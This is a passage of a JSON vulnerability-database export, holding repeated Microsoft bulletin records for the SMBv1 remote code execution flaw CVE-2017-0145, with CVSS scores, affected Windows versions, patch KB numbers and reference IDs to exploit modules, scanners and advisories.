"kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 
(Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based 
Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4014077", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", "KB4012214", "KB3205401", "KB4012606", "KB4014077", "KB4012216", "KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 
(Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based 
